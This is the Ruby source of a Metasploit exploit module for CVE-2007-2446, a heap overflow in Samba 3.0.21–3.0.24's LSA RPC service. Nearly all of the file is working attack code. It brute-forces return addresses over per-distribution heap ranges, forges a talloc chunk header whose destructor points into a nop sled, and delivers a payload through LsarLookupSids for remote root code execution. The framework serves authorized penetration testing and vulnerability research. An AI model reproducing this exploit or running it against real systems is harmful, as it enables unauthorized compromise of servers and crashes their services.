Path: blob/master/modules/exploits/linux/samba/lsa_transnames_heap.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit exploit module for CVE-2007-2446 (Samba lsa_io_trans_names heap
# overflow). Return addresses are brute-forced via Msf::Exploit::Brute; each
# candidate is handed to #brute_exploit as target_addrs['Ret'].
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client
  include Msf::Exploit::Brute

  # Registers module metadata, targets and options with the framework.
  #
  # @param info [Hash] base info hash supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Samba lsa_io_trans_names Heap Overflow',
        'Description' => %q{
          This module triggers a heap overflow in the LSA RPC service
          of the Samba daemon. This module uses the TALLOC chunk overwrite
          method (credit Ramon and Adriano), which only works with Samba
          versions 3.0.21-3.0.24. Additionally, this module will not work
          when the Samba "log level" parameter is higher than "2".
        },
        'Author' => [
          'Ramon de C Valle',
          'Adriano Lima <adriano[at]risesecurity.org>',
          'hdm'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2007-2446'],
          ['OSVDB', '34699'],
        ],
        'Privileged' => true,
        'Payload' => {
          'Space' => 1024 # no limit really
        },
        'Platform' => 'linux',
        'DefaultOptions' => {
          'PrependSetresuid' => true,
          'PrependSetreuid' => true,
          'PrependSetuid' => true
        },
        # Each target's 'Bruteforce' hash gives the Start/Stop/Step of the
        # 'Ret' value the Brute mixin iterates over; 'Nops' sizes the sled
        # built once in #brute_exploit.
        'Targets' => [
          [
            'Linux vsyscall',
            {
              'Platform' => 'linux',
              'Arch' => [ ARCH_X86 ],
              'Nops' => 1024,
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0xffffe410 },
                'Stop' => { 'Ret' => 0xffffe413 },
                'Step' => 1
              }
            }
          ],

          ##
          # 08356000-0843d000 rwxp 08356000 00:00 0 (Debian) # KF
          # 80300000-8042f000 rw-p 80300000 00:00 0 (Gentoo) # hdm
          # b800f000-b80c9000 rwxp b800f000 00:00 0 (RHEL/CentOS) # Adriano/Ramon
          # 80365000-80424000 rwxp 80365000 00:00 0 (SUSE) # Adriano/Ramon
          # 8033c000-80412000 rwxp 00000000 00:00 0 (Slackware) # Adriano/Ramon
          # 08342000-08436000 rwxp 00000000 00:00 0 (Ubuntu) # hdm
          # 08270000-0837f000 rwxp 00000000 00:00 0 (SNAP) # Andrew
          #
          ##

          [
            'Linux Heap Brute Force (Debian/Ubuntu)',
            {
              'Platform' => 'linux',
              'Arch' => [ ARCH_X86 ],
              'Nops' => 64 * 1024,
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x08352000 },
                'Stop' => { 'Ret' => 0x0843d000 },
                'Step' => 60 * 1024

              }
            }
          ],

          [
            'Linux Heap Brute Force (Gentoo)',
            {
              'Platform' => 'linux',
              'Arch' => [ ARCH_X86 ],
              'Nops' => 64 * 1024,
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x80310000 },
                'Stop' => { 'Ret' => 0x8042f000 },
                'Step' => 60 * 1024

              }
            }
          ],

          [
            'Linux Heap Brute Force (Mandriva)',
            {
              'Platform' => 'linux',
              'Arch' => [ ARCH_X86 ],
              'Nops' => 64 * 1024,
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x80380000 },
                'Stop' => { 'Ret' => 0x8045b000 },
                'Step' => 60 * 1024

              }
            }
          ],

          [
            'Linux Heap Brute Force (RHEL/CentOS)',
            {
              'Platform' => 'linux',
              'Arch' => [ ARCH_X86 ],
              'Nops' => 64 * 1024,
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0xb800f000 },
                'Stop' => { 'Ret' => 0xb80c9000 },
                'Step' => 60 * 1024

              }
            }
          ],

          [
            'Linux Heap Brute Force (SUSE)',
            {
              'Platform' => 'linux',
              'Arch' => [ ARCH_X86 ],
              'Nops' => 64 * 1024,
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x80365000 },
                'Stop' => { 'Ret' => 0x80424000 },
                'Step' => 60 * 1024

              }
            }
          ],

          [
            'Linux Heap Brute Force (Slackware)',
            {
              'Platform' => 'linux',
              'Arch' => [ ARCH_X86 ],
              'Nops' => 64 * 1024,
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x8033c000 },
                'Stop' => { 'Ret' => 0x80412000 },
                'Step' => 60 * 1024

              }
            }
          ],

          [
            'Linux Heap Brute Force (OpenWRT MIPS)',
            {
              'Platform' => 'linux',
              'Arch' => [ ARCH_MIPSBE ],
              'Nops' => 64 * 1024,
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x55900000 },
                'Stop' => { 'Ret' => 0x559c0000 },
                'Step' => 60 * 1024
              }
            }
          ],

          # Start == Stop, so the Brute mixin performs a single iteration with
          # a fixed placeholder address; useful for inspecting the request
          # on the wire or in a crash dump rather than for a real target.
          [
            'DEBUG',
            {
              'Platform' => 'linux',
              'Arch' => [ ARCH_X86 ],
              'Nops' => 1024,
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0xAABBCCDD },
                'Stop' => { 'Ret' => 0xAABBCCDD },
                'Step' => 4
              }
            }
          ],
        ],
        'DisclosureDate' => '2007-05-14',
        'DefaultTarget' => 0,
        # CRASH_SERVICE_RESTARTS / IOC_IN_LOGS: every missed brute-force
        # attempt is expected to crash the smbd child (see the rescue
        # branches in #brute_exploit) and to leave entries in the Samba logs.
        'Notes' => {
          'Stability' => [CRASH_SERVICE_RESTARTS],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        OptString.new('SMBPIPE', [ true, 'The pipe name to use', 'LSARPC']),
      ]
    )

    # SMB1 is forced in connect(versions: [1]) below, so the generic
    # protocol-version option would be misleading.
    deregister_options('SMB::ProtocolVersion')
  end

  # Fingerprints the peer via the SMB negotiated LANMAN string.
  #
  # Only the presence of "Samba" is checked here, which is broader than the
  # 3.0.21-3.0.24 gate applied in #brute_exploit; that is why this returns
  # Detected rather than Appears. Any error during the probe is reported as
  # Safe.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    connect(versions: [1])
    smb_login
    disconnect

    if smb_peer_lm =~ /Samba/i
      return CheckCode::Detected
    end

    CheckCode::Safe
  rescue StandardError
    return CheckCode::Safe
  end

  # One brute-force iteration, invoked by Msf::Exploit::Brute for each
  # candidate return address.
  #
  # Expensive or one-time work is memoized in instance variables so that it
  # survives across iterations: the nop sled (@nops) and the peer version
  # check (@checked_peerlm). A server that stops responding, disconnects the
  # pipe or returns EOF is treated as the expected outcome of a missed
  # address (the service crashes and restarts); a DCERPC Fault is taken as a
  # sign that the server is patched.
  #
  # @param target_addrs [Hash] the current brute-force step; only 'Ret' is read
  # @return [void]
  def brute_exploit(target_addrs)
    if (!@nops)
      if (target['Nops'] > 0)
        print_status('Creating nop sled....')
        @nops = make_nops(target['Nops'])
      else
        @nops = ''
      end

      # @nops = "\xcc" * (@nops.length)
    end

    print_status('Trying to exploit Samba with address 0x%.8x...' % target_addrs['Ret'])

    nops = @nops
    pipe = datastore['SMBPIPE'].downcase

    print_status('Connecting to the SMB service...')
    connect(versions: [1])
    smb_login

    # Version gate is evaluated once per run; failure aborts the whole
    # brute-force rather than just this iteration.
    if !@checked_peerlm && (smb_peer_lm !~ /Samba 3\.0\.2[1234]/i)
      fail_with(Failure::NoTarget, "This target is not a vulnerable Samba server (#{smb_peer_lm})")
    end

    @checked_peerlm = true

    # NOTE: this writes to the shared datastore and is never reset, so the
    # setting persists for the rest of the module's lifetime.
    datastore['DCERPC::fake_bind_multi'] = false

    handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"])
    print_status("Binding to #{handle} ...")
    dcerpc_bind(handle)
    print_status("Bound to #{handle} ...")

    # Relative jump placed at offset 24 of the filler; its displacement
    # depends on the sled length, which is why the sled is fixed above.
    jumper = 'P' * 256
    jumper[24, 5] = "\xe9" + [-5229 - 11 - 5 - (nops.length / 2)].pack('V')

    num_entries = 256
    num_entries2 = 272

    # first talloc_chunk
    # 16 bits align
    # 16 bits sid_name_use
    # 16 bits uni_str_len
    # 16 bits uni_max_len
    # 32 bits buffer
    # 32 bits domain_idx
    buf = (('A' * 16) * num_entries)

    # padding
    buf << 'A' * 8

    # TALLOC_MAGIC
    talloc_magic = "\x70\xec\x14\xe8"

    # second talloc_chunk header
    buf << NDR.long(0) + NDR.long(0) # next, prev
    buf << NDR.long(0) + NDR.long(0) # parent, child
    buf << NDR.long(0) # refs
    buf << [target_addrs['Ret']].pack('V') # destructor
    buf << 'A' * 4 # name
    buf << 'A' * 4 # size
    buf << talloc_magic # flags
    buf << jumper

    # Request stub starts with the policy handle returned by LsarOpenPolicy.
    stub = lsa_open_policy(dcerpc)

    # num_entries2 (272) exceeds num_entries (256): the mismatch between the
    # two counts is what the vulnerable lsa_io_trans_names parsing mishandles.
    stub << NDR.long(0) # num_entries
    stub << NDR.long(0) # ptr_sid_enum
    stub << NDR.long(num_entries) # num_entries
    stub << NDR.long(0x20004) # ptr_trans_names
    stub << NDR.long(num_entries2) # num_entries2
    stub << buf
    stub << nops
    stub << payload.encoded

    print_status('Calling the vulnerable function...')

    begin
      # LsarLookupSids
      dcerpc.call(0x0f, stub)
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError
      print_status('Server did not respond, this is expected')
    rescue Rex::Proto::DCERPC::Exceptions::Fault
      print_error('Server is most likely patched...')
    rescue StandardError => e
      # Pipe teardown surfaces as a generic error with an NT status in its
      # message; anything else is reported as unexpected.
      if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
        print_status('Server disconnected, this is expected')
      else
        print_error("Error: #{e.class}: #{e}")
      end
    end

    handler
    disconnect
  end

  # Issues LsarOpenPolicy (opnum 6) over the bound LSARPC pipe.
  #
  # @param dcerpc [Object] the bound DCERPC client used to send the call
  # @param server [String] server name marshalled as a Unicode string
  # @return [String] the first 20 bytes of the response stub (presumably the
  #   policy handle the subsequent LsarLookupSids call is keyed on)
  def lsa_open_policy(dcerpc, server = '\\')
    stubdata =
      # Server
      NDR.uwstring(server) +
      # Object Attributes
      NDR.long(24) + # SIZE
      NDR.long(0) + # LSPTR
      NDR.long(0) + # NAME
      NDR.long(0) + # ATTRS
      NDR.long(0) + # SEC DES
      # LSA QOS PTR
      NDR.long(1) + # Referent
      NDR.long(12) + # Length
      NDR.long(2) + # Impersonation
      NDR.long(1) + # Context Tracking
      NDR.long(0) + # Effective Only
      # Access Mask
      NDR.long(0x02000000)

    dcerpc.call(6, stubdata)

    dcerpc.last_response.stub_data[0, 20]
  end
end